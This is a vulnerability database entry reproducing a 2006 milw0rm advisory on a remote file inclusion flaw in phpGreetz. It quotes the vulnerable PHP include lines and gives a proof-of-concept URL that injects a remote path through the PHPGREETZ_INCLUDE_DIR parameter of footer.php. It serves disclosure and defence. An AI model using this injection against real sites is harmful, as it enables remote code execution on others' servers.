phpGreetz Remote File Inclusion Vulnerability

vendor:

phpGreetz

by:

mozi2weed@yahoo.com mozi

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpGreetz

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

phpGreetz Remote File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'PHPGREETZ_INCLUDE_DIR' parameter to the 'footer.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

# Author: mozi2weed@yahoo.com mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- nutzulake@yahoo.com
mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com
 
#phpfreaks again
# heh tnx

# milw0rm.com [2006-10-04]